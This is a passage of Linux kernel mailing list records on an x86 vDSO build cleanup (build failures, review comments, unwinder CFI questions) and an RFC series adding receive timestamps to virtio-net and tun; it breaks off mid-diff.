- do_cfa_expr(IA32_RT_SIGFRAME_sigcontext-4 + IA32_SIGCONTEXT_sp)
- do_expr(0, IA32_RT_SIGFRAME_sigcontext-4 + IA32_SIGCONTEXT_ax)
- do_expr(1, IA32_RT_SIGFRAME_sigcontext-4 + IA32_SIGCONTEXT_cx)
- do_expr(2, IA32_RT_SIGFRAME_sigcontext-4 + IA32_SIGCONTEXT_dx)
- do_expr(3, IA32_RT_SIGFRAME_sigcontext-4 + IA32_SIGCONTEXT_bx)
- do_expr(5, IA32_RT_SIGFRAME_sigcontext-4 + IA32_SIGCONTEXT_bp)
- do_expr(6, IA32_RT_SIGFRAME_sigcontext-4 + IA32_SIGCONTEXT_si)
- do_expr(7, IA32_RT_SIGFRAME_sigcontext-4 + IA32_SIGCONTEXT_di)
- do_expr(8, IA32_RT_SIGFRAME_sigcontext-4 + IA32_SIGCONTEXT_ip)
-
- .align 4
-.LENDFDEDLSI2:
+ ud2a
+ CFI_ENDPROC
+ .size __kernel_rt_sigreturn,.-__kernel_rt_sigreturn
.previous
diff --git a/arch/x86/include/asm/dwarf2.h b/arch/x86/include/asm/dwarf2.h
index 302e11b..09c9684 100644
--- a/arch/x86/include/asm/dwarf2.h
+++ b/arch/x86/include/asm/dwarf2.h
@@ -20,6 +20,7 @@
#define CFI_RESTORE_STATE .cfi_restore_state
#define CFI_UNDEFINED .cfi_undefined
#define CFI_ESCAPE .cfi_escape
+#define CFI_SIGNAL_FRAME .cfi_signal_frame
#ifndef BUILD_VDSO
/*
diff --git a/arch/x86/kernel/asm-offsets.c b/arch/x86/kernel/asm-offsets.c
index 25fcde5..0818168 100644
--- a/arch/x86/kernel/asm-offsets.c
+++ b/arch/x86/kernel/asm-offsets.c
@@ -63,8 +63,14 @@ static void __used common(void)
OFFSET(IA32_SIGCONTEXT_bp, sigcontext_32, bp);
OFFSET(IA32_SIGCONTEXT_sp, sigcontext_32, sp);
OFFSET(IA32_SIGCONTEXT_ip, sigcontext_32, ip);
+ OFFSET(IA32_SIGCONTEXT_es, sigcontext_32, es);
+ OFFSET(IA32_SIGCONTEXT_cs, sigcontext_32, cs);
+ OFFSET(IA32_SIGCONTEXT_ss, sigcontext_32, ss);
+ OFFSET(IA32_SIGCONTEXT_ds, sigcontext_32, ds);
+ OFFSET(IA32_SIGCONTEXT_flags, sigcontext_32, flags);
BLANK();
+ OFFSET(IA32_SIGFRAME_sigcontext, sigframe_ia32, sc);
OFFSET(IA32_RT_SIGFRAME_sigcontext, rt_sigframe_ia32, uc.uc_mcontext);
#endif
|
{
"author": "\"tip-bot2 for H. Peter Anvin\" <tip-bot2@linutronix.de>",
"date": "Wed, 14 Jan 2026 00:44:53 -0000",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
|
[stripped down the list of recipients quite a bit]
On 1/6/26 22:18, H. Peter Anvin wrote:
Lo! My daily -next builds for Fedora failed on x86_64 (other archs
worked fine). Haven't checked, but from the error message I wonder
if this might be due to the changes from this patch-set that showed
up in -next today:
+ /usr/bin/make -s 'HOSTCFLAGS=-O2 -fexceptions -g -grecord-gcc-switches -pipe -Wall -Werror=format-security -Wp,-U_FORTIFY_SOURCE,-D_FORTIFY_SOURCE=3 -Wp,-D_GLIBCXX_ASSERTIONS -specs=/usr/lib/rpm/redhat/redhat-hardened-cc1 -fstack-protector-strong -specs=/usr/lib/rpm/redhat/redhat-annobin-cc1 -m64 -march=x86-64 -mtune=generic -fasynchronous-unwind-tables -fstack-clash-protection -fcf-protection -mtls-dialect=gnu2 ' 'HOSTLDFLAGS=-Wl,-z,relro -Wl,--as-needed -Wl,-z,pack-relative-relocs -Wl,-z,now -specs=/usr/lib/rpm/redhat/redhat-hardened-ld -specs=/usr/lib/rpm/redhat/redhat-hardened-ld-errors -specs=/usr/lib/rpm/redhat/redhat-annobin-cc1 -Wl,--build-id=sha1 -specs=/usr/lib/rpm/redhat/redhat-package-notes ' ARCH=x86_64 INSTALL_MOD_PATH=/builddir/build/BUILD/kernel-6.19.0-build/BUILDROOT vdso_install KERNELRELEASE=6.19.0-0.0.next.20260115.439.vanilla.fc44.x86_64+rt
readelf: Error: 'arch/x86/entry/vdso/vdso32.so.dbg': No such file
readelf: Error: 'arch/x86/entry/vdso/vdso64.so.dbg': No such file
scripts/Makefile.vdsoinst:33: warning: overriding recipe for target '/builddir/build/BUILD/kernel-6.19.0-build/BUILDROOT/lib/modules/6.19.0-0.0.next.20260115.439.vanilla.fc44.x86_64+rt/vdso/.build-id/.debug'
scripts/Makefile.vdsoinst:33: warning: ignoring old recipe for target '/builddir/build/BUILD/kernel-6.19.0-build/BUILDROOT/lib/modules/6.19.0-0.0.next.20260115.439.vanilla.fc44.x86_64+rt/vdso/.build-id/.debug'
make[2]: *** No rule to make target 'arch/x86/entry/vdso/vdso32.so.dbg', needed by '/builddir/build/BUILD/kernel-6.19.0-build/BUILDROOT/lib/modules/6.19.0-0.0.next.20260115.439.vanilla.fc44.x86_64+rt/vdso/vdso32.so'. Stop.
make[1]: *** [/builddir/build/BUILD/kernel-6.19.0-build/kernel-next-20260115/linux-6.19.0-0.0.next.20260115.439.vanilla.fc44.x86_64/Makefile:1459: vdso_install] Error 2
make: *** [Makefile:256: __sub-make] Error 2
Full log:
https://download.copr.fedorainfracloud.org/results/@kernel-vanilla/next/fedora-rawhide-x86_64/10010857-next-next-all/builder-live.log.gz
Ciao, Thorsten
|
{
"author": "Thorsten Leemhuis <linux@leemhuis.info>",
"date": "Thu, 15 Jan 2026 08:00:55 +0100",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
|
On January 14, 2026 11:00:55 PM PST, Thorsten Leemhuis <linux@leemhuis.info> wrote:
Looks like it. Specifically it looks like it needs a tweak to make vdso_install. I'll look at it in a few hours.
|
{
"author": "\"H. Peter Anvin\" <hpa@zytor.com>",
"date": "Thu, 15 Jan 2026 07:00:47 -0800",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
|
On Tue, 6 Jan 2026 13:18:36 -0800 "H. Peter Anvin" <hpa@zytor.com> wrote:
Hi everyone,
I ran the tip master branch through my AI review prompts and this one was
flagged. These look right to me, apologies if it's noise:
[ ... ]
^^^^^^^
Should this be "-fno-PIE" with the leading dash? The other flags in this
line all have the dash prefix, but "fno-PIE" is missing it. Without the
dash, filter-out won't match the actual compiler flag.
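The filter-out behavior is easy to reproduce outside the kernel tree with a throwaway Makefile (the file path and flag list below are made up for the demo): GNU make's filter-out does exact word matching, so a pattern missing the leading dash never matches the real flag.

```shell
# GNU make filter-out matches whole words: "fno-PIE" (no dash) does not
# match the word "-fno-PIE", so the flag survives the filter.
cat > /tmp/filter-demo.mk <<'EOF'
FLAGS := -g -O2 -fno-PIE
$(info wrong: [$(filter-out fno-PIE,$(FLAGS))])
$(info right: [$(filter-out -fno-PIE,$(FLAGS))])
all: ;
EOF
make -s -f /tmp/filter-demo.mk
```

The first line keeps -fno-PIE in place; only the correctly spelled pattern removes it.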
^^^^^^^^^^^^^^^^^
Is GCC_PLUGIN_CFLAGS the right variable name here? The kbuild system
defines GCC_PLUGINS_CFLAGS (with an 's') in scripts/Makefile.gcc-plugins.
Other vDSO Makefiles (arm64, sparc, arm) use GCC_PLUGINS_CFLAGS. Without
the fix, gcc plugin flags won't be filtered out when CONFIG_GCC_PLUGINS=y.
[ ... ]
^^^^^^^^^^^^^^^^^^^^^
Should this be CONFIG_X86_USER_SHADOW_STACK? The Kconfig symbol is defined
as "config X86_USER_SHADOW_STACK" and kbuild exposes it as a CONFIG_
prefixed variable. The next lines show the pattern:
Both of these correctly use the CONFIG_ prefix. Without it, the shadow
stack cf-protection flag will never be added to vDSO builds even when
CONFIG_X86_USER_SHADOW_STACK=y.
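The prefix matters because kbuild includes the generated auto.conf, which defines every enabled Kconfig symbol as a make variable named CONFIG_<symbol>; the bare symbol name is simply an undefined variable. A minimal reproduction (file paths under /tmp are made up for the demo):

```shell
# Kconfig symbols reach make with a CONFIG_ prefix; referencing the bare
# name expands to nothing, so a conditional flag gated on it is never added.
cat > /tmp/auto.conf <<'EOF'
CONFIG_X86_USER_SHADOW_STACK=y
EOF
cat > /tmp/cfg-demo.mk <<'EOF'
include /tmp/auto.conf
$(info with prefix: [$(CONFIG_X86_USER_SHADOW_STACK)])
$(info bare name: [$(X86_USER_SHADOW_STACK)])
all: ;
EOF
make -s -f /tmp/cfg-demo.mk
```

Only the CONFIG_-prefixed reference expands to "y"; the bare name expands empty.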
|
{
"author": "Chris Mason <clm@meta.com>",
"date": "Thu, 15 Jan 2026 19:58:02 -0800",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
|
From: "Borislav Petkov (AMD)" <bp@alien8.de>
Date: Tue, 27 Jan 2026 23:09:13 +0100
The commit
a76108d05ee1 ("x86/entry/vdso: Move vdso2c to arch/x86/tools")
moved vdso2c to arch/x86/tools/ and commit
93d73005bff4 ("x86/entry/vdso: Rename vdso_image_* to vdso*_image")
renamed .so files but also dropped vdso2c from
arch/x86/entry/vdso/.gitignore.
It should've moved it to arch/x86/tools/.gitignore instead.
Do that.
Signed-off-by: Borislav Petkov (AMD) <bp@alien8.de>
---
arch/x86/tools/.gitignore | 1 +
1 file changed, 1 insertion(+)
diff --git a/arch/x86/tools/.gitignore b/arch/x86/tools/.gitignore
index d36dc7cf9115..51d5c22b38d7 100644
--- a/arch/x86/tools/.gitignore
+++ b/arch/x86/tools/.gitignore
@@ -1,2 +1,3 @@
# SPDX-License-Identifier: GPL-2.0-only
relocs
+vdso2c
--
2.51.0
--
Regards/Gruss,
Boris.
https://people.kernel.org/tglx/notes-about-netiquette
|
{
"author": "Borislav Petkov <bp@alien8.de>",
"date": "Tue, 27 Jan 2026 23:16:33 +0100",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
|
The following commit has been merged into the x86/entry branch of tip:
Commit-ID: ce9b1c10c3f1c723c3cc7b63aa8331fdb6c57a04
Gitweb: https://git.kernel.org/tip/ce9b1c10c3f1c723c3cc7b63aa8331fdb6c57a04
Author: Borislav Petkov (AMD) <bp@alien8.de>
AuthorDate: Tue, 27 Jan 2026 23:09:13 +01:00
Committer: Borislav Petkov (AMD) <bp@alien8.de>
CommitterDate: Tue, 27 Jan 2026 23:27:51 +01:00
x86/entry/vdso: Add vdso2c to .gitignore
The commit
a76108d05ee1 ("x86/entry/vdso: Move vdso2c to arch/x86/tools")
moved vdso2c to arch/x86/tools/ and commit
93d73005bff4 ("x86/entry/vdso: Rename vdso_image_* to vdso*_image")
renamed .so files but also dropped vdso2c from
arch/x86/entry/vdso/.gitignore.
It should've moved it to arch/x86/tools/.gitignore instead.
Do that.
Signed-off-by: Borislav Petkov (AMD) <bp@alien8.de>
Link: https://patch.msgid.link/20260127221633.GAaXk5QcG8ILa1VWYR@fat_crate.local
---
arch/x86/tools/.gitignore | 1 +
1 file changed, 1 insertion(+)
diff --git a/arch/x86/tools/.gitignore b/arch/x86/tools/.gitignore
index d36dc7c..51d5c22 100644
--- a/arch/x86/tools/.gitignore
+++ b/arch/x86/tools/.gitignore
@@ -1,2 +1,3 @@
# SPDX-License-Identifier: GPL-2.0-only
relocs
+vdso2c
|
{
"author": "\"tip-bot2 for Borislav Petkov (AMD)\" <tip-bot2@linutronix.de>",
"date": "Tue, 27 Jan 2026 22:33:30 -0000",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
|
Hello Peter!
On 1/6/2026 10:18 PM, H. Peter Anvin wrote:
Hopefully Glibc developers will do something similar for x86-64
__restore_rt() in Glibc sysdeps/unix/sysv/linux/x86_64/libc_sigaction.c.
...
...
Note that the "S" in "zRS" is the signal frame indication.
Your version no longer has this nop, nor does the FDE start one
byte earlier. Isn't that still required for unwinders?
See excerpt from dumped DWARF and disassembly for __kernel_sigreturn()
below.
...
Ditto.
Excerpt from dump of DWARF and disassembly with your patch:
$ objdump -d -Wf arch/x86/entry/vdso/vdso32/vdso32.so.dbg
...
000001cc 0000003c 00000000 CIE <-- CIE for __kernel_sigreturn
Version: 1
Augmentation: "zRS"
Code alignment factor: 1
Data alignment factor: -4
Return address column: 8
Augmentation data: 1b
DW_CFA_def_cfa: r4 (esp) ofs 4
DW_CFA_offset_extended_sf: r8 (eip) at cfa+56
DW_CFA_offset_extended_sf: r0 (eax) at cfa+44
DW_CFA_offset_extended_sf: r3 (ebx) at cfa+32
DW_CFA_offset_extended_sf: r1 (ecx) at cfa+40
DW_CFA_offset_extended_sf: r2 (edx) at cfa+36
DW_CFA_offset_extended_sf: r4 (esp) at cfa+28
DW_CFA_offset_extended_sf: r5 (ebp) at cfa+24
DW_CFA_offset_extended_sf: r6 (esi) at cfa+20
DW_CFA_offset_extended_sf: r7 (edi) at cfa+16
DW_CFA_offset_extended_sf: r40 (es) at cfa+8
DW_CFA_offset_extended_sf: r41 (cs) at cfa+60
DW_CFA_offset_extended_sf: r42 (ss) at cfa+72
DW_CFA_offset_extended_sf: r43 (ds) at cfa+12
DW_CFA_offset_extended_sf: r9 (eflags) at cfa+64
DW_CFA_nop
0000020c 00000010 00000044 FDE cie=000001cc pc=00001a40..00001a4a <-- FDE for __kernel_sigreturn
DW_CFA_advance_loc: 1 to 00001a41
DW_CFA_def_cfa_offset: 0
[ The FDE covers the range [1a40..1a4a[. Previously it would have
started one byte earlier (at the nop), so that the range would have
been [1a3f..1a4a[. This is/was required for unwinders that always
subtract one from the unwound return address, so that it points into
the instruction that invoked the function (e.g. call) instead of behind
it, in case it was invoked by a non-returning function. Such an
unwinder would now look up IP=1a3f as belonging to int80_landing_pad (and
use the DWARF rules applicable to its last instruction) instead of
__kernel_sigreturn (and its rules). Likewise for __kernel_rt_sigreturn. ]
...
00001a3c <int80_landing_pad>:
1a3c: 5d pop %ebp
1a3d: 5a pop %edx
1a3e: 59 pop %ecx
1a3f: c3 ret
00001a40 <__kernel_sigreturn>:
1a40: 58 pop %eax
1a41: b8 77 00 00 00 mov $0x77,%eax
1a46: cd 80 int $0x80
00001a48 <vdso32_sigreturn_landing_pad>:
1a48: 0f 0b ud2
1a4a: 8d b6 00 00 00 00 lea 0x0(%esi),%esi
Excerpt without your patch:
$ objdump -d -Wf arch/x86/entry/vdso/vdso32/vdso32.so.dbg
...
000001cc 00000010 00000000 CIE <-- CIE for __kernel_sigreturn and __kernel_rt_sigreturn
Version: 1
Augmentation: "zRS"
Code alignment factor: 1
Data alignment factor: -4
Return address column: 8
Augmentation data: 1b
DW_CFA_nop
DW_CFA_nop
000001e0 00000068 00000018 FDE cie=000001cc pc=00001a6f..00001a78 <-- FDE for __kernel_sigreturn
DW_CFA_def_cfa_expression (DW_OP_breg4 (esp): 32; DW_OP_deref)
DW_CFA_expression: r0 (eax) (DW_OP_breg4 (esp): 48)
DW_CFA_expression: r1 (ecx) (DW_OP_breg4 (esp): 44)
DW_CFA_expression: r2 (edx) (DW_OP_breg4 (esp): 40)
DW_CFA_expression: r3 (ebx) (DW_OP_breg4 (esp): 36)
DW_CFA_expression: r5 (ebp) (DW_OP_breg4 (esp): 28)
DW_CFA_expression: r6 (esi) (DW_OP_breg4 (esp): 24)
DW_CFA_expression: r7 (edi) (DW_OP_breg4 (esp): 20)
DW_CFA_expression: r8 (eip) (DW_OP_breg4 (esp): 60)
DW_CFA_advance_loc: 2 to 00001a71
DW_CFA_def_cfa_expression (DW_OP_breg4 (esp): 28; DW_OP_deref)
DW_CFA_expression: r0 (eax) (DW_OP_breg4 (esp): 44)
DW_CFA_expression: r1 (ecx) (DW_OP_breg4 (esp): 40)
DW_CFA_expression: r2 (edx) (DW_OP_breg4 (esp): 36)
DW_CFA_expression: r3 (ebx) (DW_OP_breg4 (esp): 32)
DW_CFA_expression: r5 (ebp) (DW_OP_breg4 (esp): 24)
DW_CFA_expression: r6 (esi) (DW_OP_breg4 (esp): 20)
DW_CFA_expression: r7 (edi) (DW_OP_breg4 (esp): 16)
DW_CFA_expression: r8 (eip) (DW_OP_breg4 (esp): 56)
[ See how the FDE for __kernel_sigreturn covers the range [1a6f..1a78[.
An unwinder that always subtracts one from the return address would
look up IP=1a6f as belonging to __kernel_sigreturn (and use the DWARF
rules applicable to the nop preceding its symbol). Likewise for
__kernel_rt_sigreturn. Or is that no longer true? ]
...
00001a5c <int80_landing_pad>:
1a5c: 5d pop %ebp
1a5d: 5a pop %edx
1a5e: 59 pop %ecx
1a5f: c3 ret
1a60: 90 nop
1a61: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi
1a68: 2e 8d b4 26 00 00 00 lea %cs:0x0(%esi,%eiz,1),%esi
1a6f: 00
00001a70 <__kernel_sigreturn>:
1a70: 58 pop %eax
1a71: b8 77 00 00 00 mov $0x77,%eax
1a76: cd 80 int $0x80
Thanks and regards,
Jens
--
Jens Remus
Linux on Z Development (D3303)
jremus@de.ibm.com / jremus@linux.ibm.com
IBM Deutschland Research & Development GmbH; Vorsitzender des Aufsichtsrats: Wolfgang Wendt; Geschäftsführung: David Faller; Sitz der Gesellschaft: Ehningen; Registergericht: Amtsgericht Stuttgart, HRB 243294
IBM Data Privacy Statement: https://www.ibm.com/privacy/
|
{
"author": "Jens Remus <jremus@linux.ibm.com>",
"date": "Mon, 2 Feb 2026 18:02:48 +0100",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH RFC v2 0/2] virtio-net: add flow filter for receive
timestamps
|
This series tries to pick up the work on the virtio-net timestamping
feature from Willem de Bruijn.
Original series
Message-Id: 20210208185558.995292-1-willemdebruijn.kernel@gmail.com
Subject: [PATCH RFC v2 0/4] virtio-net: add tx-hash, rx-tstamp,
tx-tstamp and tx-time
From: Willem de Bruijn <willemb@google.com>
RFC for four new features to the virtio network device:
1. pass tx flow state to host, for routing + telemetry
2. pass rx tstamp to guest, for better RTT estimation
3. pass tx tstamp to guest, idem
4. pass tx delivery time to host, for accurate pacing
All would introduce an extension to the virtio spec.
The changes in this series are to the driver side. For the changes to qemu see:
https://github.com/strumtrar/qemu/tree/v10.2.0/virtio-rx-stamps
Currently only virtio-net is supported. Performance was tested with
pktgen, which showed no decrease in transfer speeds.
As these patches are now mostly different from the initial patchset, I removed
the Signed-off-bys from Willem, so he needn't be ashamed of what his work has evolved into ;)
Signed-off-by: Steffen Trumtrar <s.trumtrar@pengutronix.de>
---
Changes in v2:
- rework patches to use flow filter instead of feature flag
- Link to v1: https://lore.kernel.org/r/20231218-v6-7-topic-virtio-net-ptp-v1-0-cac92b2d8532@pengutronix.de
---
Steffen Trumtrar (2):
tun: support rx-tstamp
virtio-net: support receive timestamp
drivers/net/tun.c | 30 +++++----
drivers/net/virtio_net.c | 136 ++++++++++++++++++++++++++++++++++++----
include/uapi/linux/virtio_net.h | 9 +++
3 files changed, 151 insertions(+), 24 deletions(-)
---
base-commit: 8f0b4cce4481fb22653697cced8d0d04027cb1e8
change-id: 20231218-v6-7-topic-virtio-net-ptp-3df023bc4f4d
Best regards,
--
Steffen Trumtrar <s.trumtrar@pengutronix.de>
|
Demonstrate support for new virtio-net features
VIRTIO_NET_HDR_F_TSTAMP
This is not intended to be merged.
A full feature test also requires a patched qemu binary that knows
these features and negotiates correct vnet_hdr_sz in
virtio_net_set_mrg_rx_bufs. See
https://github.com/strumtrar/qemu/tree/v10.2.0/virtio-rx-stamps
Not-yet-signed-off-by: Steffen Trumtrar <s.trumtrar@pengutronix.de>
---
drivers/net/tun.c | 30 ++++++++++++++++++------------
1 file changed, 18 insertions(+), 12 deletions(-)
diff --git a/drivers/net/tun.c b/drivers/net/tun.c
index 8192740357a09..aa988a9c4bc99 100644
--- a/drivers/net/tun.c
+++ b/drivers/net/tun.c
@@ -2065,23 +2065,29 @@ static ssize_t tun_put_user(struct tun_struct *tun,
}
if (vnet_hdr_sz) {
- struct virtio_net_hdr_v1_hash_tunnel hdr;
- struct virtio_net_hdr *gso;
+ struct virtio_net_hdr_v1_hash_tunnel_ts hdr;
+
+ memset(&hdr, 0, sizeof(hdr));
ret = tun_vnet_hdr_tnl_from_skb(tun->flags, tun->dev, skb,
- &hdr);
+ (struct virtio_net_hdr_v1_hash_tunnel *)&hdr);
if (ret)
return ret;
- /*
- * Drop the packet if the configured header size is too small
- * WRT the enabled offloads.
- */
- gso = (struct virtio_net_hdr *)&hdr;
- ret = __tun_vnet_hdr_put(vnet_hdr_sz, tun->dev->features,
- iter, gso);
- if (ret)
- return ret;
+ if (vnet_hdr_sz >= sizeof(struct virtio_net_hdr_v1_hash_tunnel_ts)) {
+ __le64 tstamp = cpu_to_le64(ktime_get_ns());
+
+ hdr.tstamp_0 = (tstamp & 0x000000000000ffffULL) >> 0;
+ hdr.tstamp_1 = (tstamp & 0x00000000ffff0000ULL) >> 16;
+ hdr.tstamp_2 = (tstamp & 0x0000ffff00000000ULL) >> 32;
+ hdr.tstamp_3 = (tstamp & 0xffff000000000000ULL) >> 48;
+ }
+
+ if (unlikely(iov_iter_count(iter) < vnet_hdr_sz))
+ return -EINVAL;
+
+ if (unlikely(copy_to_iter(&hdr, vnet_hdr_sz, iter) != vnet_hdr_sz))
+ return -EFAULT;
}
if (vlan_hlen) {
--
2.52.0
|
{
"author": "Steffen Trumtrar <s.trumtrar@pengutronix.de>",
"date": "Thu, 29 Jan 2026 09:06:41 +0100",
"thread_id": "willemdebruijn.kernel.16b0979449c84@gmail.com.mbox.gz"
}
|
lkml
|
[PATCH RFC v2 0/2] virtio-net: add flow filter for receive
timestamps
|
This series tries to pick up the work on the virtio-net timestamping
feature from Willem de Bruijn.
Original series
Message-Id: 20210208185558.995292-1-willemdebruijn.kernel@gmail.com
Subject: [PATCH RFC v2 0/4] virtio-net: add tx-hash, rx-tstamp,
tx-tstamp and tx-time
From: Willem de Bruijn <willemb@google.com>
RFC for four new features to the virtio network device:
1. pass tx flow state to host, for routing + telemetry
2. pass rx tstamp to guest, for better RTT estimation
3. pass tx tstamp to guest, idem
4. pass tx delivery time to host, for accurate pacing
All would introduce an extension to the virtio spec.
The changes in this series are to the driver side. For the changes to qemu see:
https://github.com/strumtrar/qemu/tree/v10.2.0/virtio-rx-stamps
Currently only virtio-net is supported. Performance was tested with
pktgen, which showed no decrease in transfer speeds.
As these patches are now mostly different from the initial patchset, I removed
Willem's Signed-off-bys, so he needn't be ashamed of what his work has evolved into ;)
Signed-off-by: Steffen Trumtrar <s.trumtrar@pengutronix.de>
---
Changes in v2:
- rework patches to use flow filter instead of feature flag
- Link to v1: https://lore.kernel.org/r/20231218-v6-7-topic-virtio-net-ptp-v1-0-cac92b2d8532@pengutronix.de
---
Steffen Trumtrar (2):
tun: support rx-tstamp
virtio-net: support receive timestamp
drivers/net/tun.c | 30 +++++----
drivers/net/virtio_net.c | 136 ++++++++++++++++++++++++++++++++++++----
include/uapi/linux/virtio_net.h | 9 +++
3 files changed, 151 insertions(+), 24 deletions(-)
---
base-commit: 8f0b4cce4481fb22653697cced8d0d04027cb1e8
change-id: 20231218-v6-7-topic-virtio-net-ptp-3df023bc4f4d
Best regards,
--
Steffen Trumtrar <s.trumtrar@pengutronix.de>
|
Add optional hardware rx timestamp offload for virtio-net.
Introduce virtio feature VIRTIO_NET_F_TSTAMP. If negotiated, the
virtio-net header is expanded with room for a timestamp.
To get and set the hwtstamp config, the ndo_hwtstamp_set/get callbacks need
to be implemented. This allows filtering packets and time stamping only
those that match the filter. This way, timestamping can be
enabled and disabled at runtime.
Tested:
guest: ./timestamping eth0 \
SOF_TIMESTAMPING_RAW_HARDWARE \
SOF_TIMESTAMPING_RX_HARDWARE
host: nc -4 -u 192.168.1.1 319
Signed-off-by: Steffen Trumtrar <s.trumtrar@pengutronix.de>
--
Changes since last version:
- rework series to use flow filters
- add new struct virtio_net_hdr_v1_hash_tunnel_ts
- original work done by: Willem de Bruijn <willemb@google.com>
---
drivers/net/virtio_net.c | 136 ++++++++++++++++++++++++++++++++++++----
include/uapi/linux/virtio_net.h | 9 +++
2 files changed, 133 insertions(+), 12 deletions(-)
diff --git a/drivers/net/virtio_net.c b/drivers/net/virtio_net.c
index 1bb3aeca66c6e..4e8d9b20c1b34 100644
--- a/drivers/net/virtio_net.c
+++ b/drivers/net/virtio_net.c
@@ -429,6 +429,9 @@ struct virtnet_info {
struct virtio_net_rss_config_trailer rss_trailer;
u8 rss_hash_key_data[VIRTIO_NET_RSS_MAX_KEY_SIZE];
+ /* Device passes time stamps from the driver */
+ bool has_tstamp;
+
/* Has control virtqueue */
bool has_cvq;
@@ -475,6 +478,8 @@ struct virtnet_info {
struct control_buf *ctrl;
+ struct kernel_hwtstamp_config tstamp_config;
+
/* Ethtool settings */
u8 duplex;
u32 speed;
@@ -511,6 +516,7 @@ struct virtio_net_common_hdr {
struct virtio_net_hdr_mrg_rxbuf mrg_hdr;
struct virtio_net_hdr_v1_hash hash_v1_hdr;
struct virtio_net_hdr_v1_hash_tunnel tnl_hdr;
+ struct virtio_net_hdr_v1_hash_tunnel_ts ts_hdr;
};
};
@@ -682,6 +688,13 @@ skb_vnet_common_hdr(struct sk_buff *skb)
return (struct virtio_net_common_hdr *)skb->cb;
}
+static inline struct virtio_net_hdr_v1_hash_tunnel_ts *skb_vnet_hdr_ts(struct sk_buff *skb)
+{
+ BUILD_BUG_ON(sizeof(struct virtio_net_hdr_v1_hash_tunnel_ts) > sizeof(skb->cb));
+
+ return (void *)skb->cb;
+}
+
/*
* private is used to chain pages for big packets, put the whole
* most recent used list in the beginning for reuse
@@ -2560,6 +2573,15 @@ virtio_net_hash_value(const struct virtio_net_hdr_v1_hash *hdr_hash)
(__le16_to_cpu(hdr_hash->hash_value_hi) << 16);
}
+static inline u64
+virtio_net_tstamp_value(const struct virtio_net_hdr_v1_hash_tunnel_ts *hdr_hash_ts)
+{
+ return (u64)__le16_to_cpu(hdr_hash_ts->tstamp_0) |
+ ((u64)__le16_to_cpu(hdr_hash_ts->tstamp_1) << 16) |
+ ((u64)__le16_to_cpu(hdr_hash_ts->tstamp_2) << 32) |
+ ((u64)__le16_to_cpu(hdr_hash_ts->tstamp_3) << 48);
+}
+
static void virtio_skb_set_hash(const struct virtio_net_hdr_v1_hash *hdr_hash,
struct sk_buff *skb)
{
@@ -2589,6 +2611,18 @@ static void virtio_skb_set_hash(const struct virtio_net_hdr_v1_hash *hdr_hash,
skb_set_hash(skb, virtio_net_hash_value(hdr_hash), rss_hash_type);
}
+static inline void virtnet_record_rx_tstamp(const struct virtnet_info *vi,
+ struct sk_buff *skb)
+{
+ struct skb_shared_hwtstamps *shhwtstamps = skb_hwtstamps(skb);
+ const struct virtio_net_hdr_v1_hash_tunnel_ts *h = skb_vnet_hdr_ts(skb);
+ u64 ts;
+
+ ts = virtio_net_tstamp_value(h);
+ memset(shhwtstamps, 0, sizeof(struct skb_shared_hwtstamps));
+ shhwtstamps->hwtstamp = ns_to_ktime(ts);
+}
+
static void virtnet_receive_done(struct virtnet_info *vi, struct receive_queue *rq,
struct sk_buff *skb, u8 flags)
{
@@ -2617,6 +2651,8 @@ static void virtnet_receive_done(struct virtnet_info *vi, struct receive_queue *
goto frame_err;
}
+ if (vi->has_tstamp && vi->tstamp_config.rx_filter != HWTSTAMP_FILTER_NONE)
+ virtnet_record_rx_tstamp(vi, skb);
skb_record_rx_queue(skb, vq2rxq(rq->vq));
skb->protocol = eth_type_trans(skb, dev);
pr_debug("Receiving skb proto 0x%04x len %i type %i\n",
@@ -3321,7 +3357,7 @@ static int xmit_skb(struct send_queue *sq, struct sk_buff *skb, bool orphan)
{
const unsigned char *dest = ((struct ethhdr *)skb->data)->h_dest;
struct virtnet_info *vi = sq->vq->vdev->priv;
- struct virtio_net_hdr_v1_hash_tunnel *hdr;
+ struct virtio_net_hdr_v1_hash_tunnel_ts *hdr;
int num_sg;
unsigned hdr_len = vi->hdr_len;
bool can_push;
@@ -3329,8 +3365,8 @@ static int xmit_skb(struct send_queue *sq, struct sk_buff *skb, bool orphan)
pr_debug("%s: xmit %p %pM\n", vi->dev->name, skb, dest);
/* Make sure it's safe to cast between formats */
- BUILD_BUG_ON(__alignof__(*hdr) != __alignof__(hdr->hash_hdr));
- BUILD_BUG_ON(__alignof__(*hdr) != __alignof__(hdr->hash_hdr.hdr));
+ BUILD_BUG_ON(__alignof__(*hdr) != __alignof__(hdr->tnl.hash_hdr));
+ BUILD_BUG_ON(__alignof__(*hdr) != __alignof__(hdr->tnl.hash_hdr.hdr));
can_push = vi->any_header_sg &&
!((unsigned long)skb->data & (__alignof__(*hdr) - 1)) &&
@@ -3338,18 +3374,18 @@ static int xmit_skb(struct send_queue *sq, struct sk_buff *skb, bool orphan)
/* Even if we can, don't push here yet as this would skew
* csum_start offset below. */
if (can_push)
- hdr = (struct virtio_net_hdr_v1_hash_tunnel *)(skb->data -
- hdr_len);
+ hdr = (struct virtio_net_hdr_v1_hash_tunnel_ts *)(skb->data -
+ hdr_len);
else
- hdr = &skb_vnet_common_hdr(skb)->tnl_hdr;
+ hdr = &skb_vnet_common_hdr(skb)->ts_hdr;
- if (virtio_net_hdr_tnl_from_skb(skb, hdr, vi->tx_tnl,
